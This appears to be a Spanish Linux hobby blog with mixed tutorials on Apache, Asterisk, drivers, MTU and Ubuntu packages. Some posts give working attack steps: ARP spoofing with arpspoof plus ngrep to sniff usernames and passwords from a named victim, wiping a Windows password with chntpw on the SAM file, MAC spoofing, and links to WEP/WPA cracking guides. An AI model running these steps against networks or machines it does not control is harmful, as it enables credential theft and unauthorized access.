.:TribuKogi:.

INSTALACION Y CONFIGURACION DEL APACHE

Para instalar apache primero debemos descargarnos la versión de código fuente de apache luego de eso la descomprimimos hay q tener en cuenta q el demonio httpd necesitan funcionar con la hora correcta por eso podemos utilizar ntpdate que nos permite sincronizar la hora nuestra con la de un servidor ntp en el archivo de configuracion del ntpdate que se encuentra en etc/defautl/ntpdate hay una linea NTPSERVERS la hacemos igual al servidor con queremos sincronizar y en la opcion de NTPOPTIONS la hacemos igual –u que indicar que esa conexión es sin privilegios.

Una vez terminado todo esto se procede a configurar la compilacion del httpd la opcion mas importante del apache es –prefix que es donde apache va hacer instalado sino se indicar por defecto en la instalación en usr/local/apache2

Una vez instalado queda configurarlo correctamente para su funcionamiento esto se hace dentro del archivo httpd.conf este archivo contiene todas las directivas para configuración del demonio httpd

Creación de Host Virtuales

La utilidad de los host virtuales es que nos permite tener múltiples páginas web con una sola dirección ip para eso primero debemos editar el archivo /etc/host este archivo primero ponemos la dirección ip y después ponemos el nombre del dominio por ejemplo 192.168.1.65 www.tribukogi.com guardamos y vamos al archivo /usr/local/apache2/conf/httpd.conf aquí copiamos las directivas necesarias para hacerlo como sigue

Permitir Acceso al Servidor Web

Apache permite que apliquemos políticas a nuestros servidor permitiendo que ciertos usuario puedan ver la información que queramos o ingresar a una determinada zona para eso apache proporciona la directiva <Directory “Nombre Fichero”></Directory> dentro de ellas especificamos las reglas que queremos aplicar al directorio indicado para eso tenemos que agregar un usuario de la siguiente forma htpasswd –c /Rutadirectorio/nombrearchivo usuario la opción –c indica que cree un archivo nuevo de para guardar las contraseña la opción usuario un nombre de usuario que queramos que aparezcan y nos pide un password lo ingresamos y ya tenemos un usuario que valido para el sistema

Apache por defecto tiene especificado que los usuarios no puedan tener permisos sobre los ficheros del sistema así que si en DocumentRoot la ruta de un directorio distinto de usr/local/apache/htdocs no podremos visualizar nuestros host virtuales por estos no tiene permisos para visualizarlos acontinuacion explicare cada unas de las opciones que aparecen en la Etiqueta <Directory>

· AuthName:esta opción le indica al navegador que por cada archivo pida autentificación

· AuthType: esta directiva indica el tipo de autentificación que se utilizara existen dos Basic que envía el nombre de usuario y la contraseña en formato de texto plano o Digest que la envía Encriptado

· AuthUserFile: con esta indicaremos que donde se encuentra el archivo donde encontraremos los nombre de usuario y las contraseñas este archivos es el mismo que se creó con htpasswd

· AuthGroup: al igual que la anterior pero en este caso le indicamos la ruta donde encontrar el nombre del grupo que contiene los usuario el archivo del grupo debe tener el siguiente formato Nombre_Grupo:Usuario1,Usuario2 pero cada usuario debe estar registrado como se mostro anteriormente

· Require: en esta directiva especificamos a que usuario o grupos se le otorgara permiso sobre dicho directorio

Las últimas directivas son muy importantes por que consideremos que tenemos un usuario en nuestro foro que envía mensaje obscenos y queremos denegar el contenido de la pagina entonces simplemente ponemos la directiva Deny from “Direccion Ip del Usuario” y listo y el contenido no podrá servisto por el usuario o si quieres permitir el acceso a un usuario simplemente utiliza Allow con los mismos parametros, Order simplemente significa el orden en que se aplicaran las politicas

Asterisk

Primero instalamos el ssh para poder conectarnos al servidor asterisk remotamente en un futuro

aptitude install ssh

descargamos los paquetes de asterisk de la pagina oficial (El dia que escribo esto estas son las ultimas versiones)

http://www.asterisk.org/downloads

Asterisk 1.6.1.1    *Asterisk
DAHDI Linux 2.1.0.4    *Driver para la tarjeta fisica
DAHDI Tools 2.1.0.2    *Herramientas de monitoreo y mas
Libpri 1.4.10        *Librerias del redsi
Addons 1.6.1.0        *Addons como el formato mp3, los codecs privativos h323, y demas

despues de descargarlos los ubicamos en la carpeta /usr/src/ , siempre que se desea instalar algo compilando debemos ubicarlo allí

instalamos el build-essential el “automake”, el “autoconf” y los headers

aptitude install build-essential automake autoconf linux-headers-`uname -r`

vamos a la carpeta /usr/src/ y desde allí descompirmimos los archivos con

sudo tar xzvf Asterisk 1.6.1.1.tar.gz
sudo tar xzvf DAHDI Linux 2.1.0.4.tar.gz
sudo tar xzvf DAHDI Tools 2.1.0.2.tar.gz
sudo tar xzvf Libpri 1.4.10.tar.gz
sudo tar xzvf Addons 1.6.1.0.tar.gz

primero instalamos los drivers de la tarjeta     DAHDI Linux 2.1.0.4 de la suiguiente manera, nos ubicamso en /usr/src/DAHDI Linux

sudo make
sudo make install

si todo sale bien saldra este mensaje
###################################################
###
### DAHDI installed successfully.
### If you have not done so before, install the package
### dahdi-tools.
###
###################################################

hacemos lo mismo para instalar DAHDI Tools, nos ubicamos en /usr/src/DAHDI-Tools

sudo ./configure
sudo make
sudo make menuselect   *(este funciona si no se tiene entorno grafico instalado y permite seleccionar las cosas a instalar)
sudo make install

y si funciona saldra algo asi
###################################################
###
### DAHDI tools installed successfully.
### If you have not done so before, install init scripts with:
###
###   make config
###
###################################################

make config

de nuevo hacemos lo mismo para instalar Libpri, nos ubicamos en /usr/src/Libpri-1.4.10

sudo ./configure
sudo make
sudo make install


ya solo quedan faltando dos paquetes, seguismo con el asterisk1.6.1 nos ubicamos en /usr/src/asterisk1.6.1

./configure

NOTA: si nos aparece este error “configure: error: *** termcap support not found” instalamos el paquete “sudo apt-get install libncurses-dev”
luego

make menuselect
sudo make
sudo make instal
make config
make samplesl

Para finalizar instalaremos el ultimo paquete, nos ubicaremos den la ruta /usr/src/asterisk-addons-1.6.1.0 y haremos lo mismo

./configure
make menuselect
make
make install
make config
make samples

Modificar el Makefile para que guarde los cdr en mysql con el accountcode dentro de la carpeta de  /usr/src/asterisk-addons-1.6.1.0

agregamos la linea en al parte del archivo Makefile ubicado en la carpeta asterisk-addon


CFLAGS+=-DMYSQL_LOGUNIQUEID #estos se despues del ./configure y antes del make

Solo Falta configurarlo, eso lo colocare en otro capitulo

Saludos

Freedoom

En los ultimos dias he probado la debilidad de las redes inalambricas y acá les dejo unos buenos manuales muy bien explicados para detectar las contraseñas de las redes inalambricas encritadas bajo WEP, WPA y WPA2, los he hecho en un accesspoint casero y han funcionado a la perfección, les recuerdo que la distribucion de linux usada para las pruebas fue BackTrack el cual pueden descargar de el siguiente link

Descargar BackTrack

Antes de darle los links debo decirles que para poder conseguir los datos de redes inalambricas, debe existir almenos un equio conectado inalambricamente al Access point ya que cada vez que el AP (Access point) transmite los datos allí viaja la contraseña, lo que hacemos nosotros es caturar los paquetes que viajen por el espectro electromagnetico los almacenamos y despues de tener suficientes pasamos a desencriptarlos todo esto es la teoria, ahora vamos a la practica

Para claves WEP

Simple crackeo de clave WEP

Para claves WPA y WPA2

Simple crackeo de claves WPA y WPA2

RECUERDEN HACER ESTO EN REDES PROPIAS Y CON FINES EDUCATIVOS

Saludos

Un paquete Capturado!

Antes que nada este tutorial esta diseñado para implementar bajo GNU/Linux (no se si las aplicaciones existan para windows)

Primero

Activamos el modo promiscuo

sysctl -w net.ipv4.ip_forward=1

despues infectamos la tabla arp constantemente con

arpspoof -i eth0 192.168.20.128

donde
eth0         = es la interface
192.168.20.128     = es la victima

despues en otra consola

Luego para capturar los datos a las páginas que accesa colcoamos el siguiente comando

ngrep -W byline -wi 'user|paasword' | tee /home/trafico.out

donde

user            = es el nombre del campo donde se ingresa el nombre de usuario
password        = es el nombre del campo donde se ingresa la contraseña
tee /home/trafico.out    = esto nos permite grabar la informacion en u narchivo y luego revisarlo detenidamente

‘user|paasword’ en si es un filtro donde uno peude colocar cualquier cosa
PD: la W es MAYUSCULA!

Saludis

Recuerden usar esto en redes propias o con respectivo permiso y solo con fines educativos, no me hago responsable por cualesquier daño

Driver Nvidia

Primero que todo antes coloque como hacerlo en debian luegod e borrar debian e instalar backtrack 4 (BT) intente hacerlo com oen debian y no finciono :’( asi que me toco volver a buscar y despeus de dos noches de jalandole a eso porfin los resultados esperados

Primero descargamos el driver segun nuestro procesador

el mio es un intel x86

http://linux.softpedia.com/get/System/Hardware/nVidia-Linux-Display-Driver-IA32-7787.shtml

para AMD64/EM64T

http://linux.softpedia.com/get/System/Hardware/nVidia-Linux-Display-Driver-AMD64-EM64T-11290.shtml

para FreeBSD

http://linux.softpedia.com/get/System/Hardware/nVidia-FreeBSD-Display-Driver-x86-11291.shtml

y para solaris

http://linux.softpedia.com/get/System/Hardware/nVidia-Solaris-Display-Driver-x86-46513.shtml


despues de descargar el driver en la consola de backtrack (la cual carga por defecto) colocamos el siguiente comando
sh NVIDIA-Linux-x86-180.60-pkg1.run

Seguimos los pasos que nos muestra en pantalla y listo al finalizar es solo ejecutar

startx

Saludos!

Seguridad!!! en windows

Primero instalaremos el paquete (el BackTrack 4 lo trae por defecto)

sudo aptitude install chntpw

luego procedemos a ver los usuarios y cambiar o dejar el password en blanco

sudo chntpw -l -i /mnt/c/WINDOWS/system32/config/SAM

donde

-i es para crear una interface amigable
-l es para listar los usuarios que encontremos en ela rchivo SAM
/mnt/c/WINDOWS/system32/config/SAM es donde previamente hemos montado la partición de windows y localizamos el archivo SAM que por defecto esta en /WINDOWS/system32/config/SAM

nos mostrara el siguiente menú

sudo chntpw -l -i /mnt/c/WINDOWS/system32/config/SAM
chntpw version 0.99.5 070923 (decade), (c) Petter N Hagen
Hive name (from header): <\SystemRoot\System32\Config\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c
Page at 0x9000 is not 'hbin', assuming file contains garbage at end
File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 327/29944 blocks/bytes, unused: 3/2568 blocks/bytes.


* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length : 0
Password history count : 0

======== chntpw Main Interactive Menu ========

Loaded hives:

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> 1

Seleccionaremos la opción 1 para reiniciar el password y veremos algo asi

What to do? [1] -> 1

===== chntpw Edit User Info & Passwords ====

| RID -|———- Username ————| Admin? |- Lock? –|
| 01f4 | Administrador | ADMIN | |
| 03e8 | Asistente de ayuda | | dis/lock |
| 01f5 | Invitado | | dis/lock |
| 03eb | pibe | ADMIN | *BLANK* |
| 03ea | SUPPORT_388945a0 | | dis/lock |
| 03f6 | __vmware_user__ | | |

Select: ! - quit, . - list users, 0x - User with RID (hex)
or simply enter the username to change: [Administrador] Administrator

en mi caso seleccionare el “Administrator” y aparecera esto

or simply enter the username to change: [Administrador] Administrator

RID : 0500 [01f4]
Username: Administrador
fullname:
comment : Cuenta para la administraci�n del equipo o dominio
homedir :

User is member of 1 groups:
00000220 = Administradores (which has 2 members)

Account bits: 0×0210 =
[ ] Disabled | [ ] Homedir req. | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don’t expir | [ ] Auto lockout | [ ] (unknown 0×08) |
[ ] (unknown 0×10) | [ ] (unknown 0×20) | [ ] (unknown 0×40) |

Failed login count: 0, while max tries is: 0
Total login count: 0

- - - - User Edit Menu:
1 - Clear (blank) user password
2 - Edit (set new) user password (careful with this on XP or Vista)
3 - Promote user (make user an administrator)
(4 - Unlock and enable user account) [seems unlocked already]
q - Quit editing user, back to user select
Select: [q] >

y para finalizar colocaremos la Opción 1 que es para dejar el password en blanco

Password cleared!

y por ultimo le damos “!” luego “q” para salir nos pregunta que si deseamos guardar le damos “Yes”

Eso es todo amigos!

Recuerden usar esto bajo autorización y/o con fines educativos. No me hago responsable por daños o perjuicios

Si desean mas info

man chntpw

chntpw -h

Puerto de Buenaventura (Este puerto no existe en los sitemas informáticos :P)

Bueno acá les traigo una lista de puertos y protocolos de los mas comunes y mas usados, logicamente faltaran algunos pero acá estan lo prinicpales

La mayoria de estos trabajan en ambos, tanto en TCP como en UDP, esto puede ser util a la hora de configurar un cortafuegos como iptables

Espero que les haya servido

Si desean tener mas informacion hagan un

cat /etc/services

Saludillos!!!

Holas para los que piensan que la MAC es estática pues tienen razón y los que creen que no se puede cambiar estan errados en linux hay varias maneras de hacerlo una es con el comando ifconfig pero en e ste caso explicare otra con un comando diferente

priemro descargamos la aplicación

sudo aptitude install macchanger

Luego procedemos a desactivar la tarjeta de red para evitar conflictos (en mi caso es la interface 0)

sudo ifconfig eth0 down

Ahora si poemos cambiar la direccion mac tranquilamente

macchanger --mac=10:10:10:10:10:10:10 eth0

donde

10:10:10:10:10:10:10 es la nueva dirección mac que deseamos colocarle a la tarjeta de red

y eth0 es la interface a la cual le cambiaremos la mac

despues de cambiar la MAC procedemos a subir de nuevo la tarjeta con

ifconfig eth0 up

y listo ya hemos cambiado la dirección MAC

Logicamente el macchanger tiene un monton de utilidades para mas información

man macchanger

y

macchanger --help

Suerte!

Holas, para comenzar les mostrare que es el MTU

La unidad máxima de transferencia (Maximum Transfer Unit - MTU) es un término de redes de computadoras que expresa el tamaño en bytes de la unidad de datos más grande que puede enviarse usando un Protocolo de Internet.

Ejemplos de MTU para distintos protocolos usados en Internet:

• Ethernet: 1518 bytes
• PPPoE: 1492 bytes
• ATM (AAL5): 8190 bytes
• FDDI: 4470 bytes
• PPP: 576 bytes

http://es.wikipedia.org/wiki/MTU*

En conclusión es el tamaño maximo de un paquete, por lo general en latinoamerica es de 1500 no se en otras partes del mundo

Para modificar este valor en sistemas GNU/Linux es simple, lo hacemos mediante el comando ifconfig como muestro a continuación:

sudo ifconfig eth0 mtu 1500

Espero que les haya servido

Saludos!

*Si desean saber mas sobre MTU los invito a leer sobre los RFC

RFC MTU 879

RFC MTU 1191

Hoy le traigo algunas cosas que se deben de hacer después de la instalación de Ubuntu en nuestro ordenador

Primero actualizamos los repos…

#aptitude update

• Instalamos la herramienta build-essential que es necesario para compilar

#aptitude -r install build-essential

• Ahora instalaremos los ubuntu-restricted-extras que son paquetes que por cuestiones legales no bienen incluidos en Ubuntu

#aptitude -r install ubuntu-restricted-extras

• Instalar Flash-Player para nuestro navegador

#aptitude -r install flashplugin-nonfree libflashsupport flashplugin-nonfree-extrasound

• Instalar JavaJava Runtime Environment para ejecutar aplicaciones basadas en java y tener el plugin instalado en nuestro navegador

#aptitude -r install un-java6-fonts sun-java6-jre sun-java6-plugin

• Instalar Compresores-Descompresores

#aptitude -r install unrar rar p7zip-full unace unzip

• Instalar smplayer y los codes necesario para reproducir DVD y otros codes de Windows

#aptitude -r install smplayer libdvdcss2 libdvdread3

Para i386:

#aptitude -r install w32codecs

Para amd64:

#aptitude -r install w64codecs

• Instalar los paquetes de fuentes de Microsoft

#aptitude -r install msttcorefonts

#fc-cache ———- para reiniciar el cache de las fuentes

• Instalar aMsn

#aptitude -r install amsn

• Instalar Envy para administrar nuestros controladores de vídeo NVIDIA y ATI

#aptitude -r install envyng-gtk envyng-core

• Instalar Wine para ejecutar ciertas aplicaciones Windows en nuestro Ubuntu

#aptitude -r install wine

• Instalar K3b para quemar nuestros CD y DVD favoritos

#aptitude -r install k3b

Espero que les sea útil

Chaoo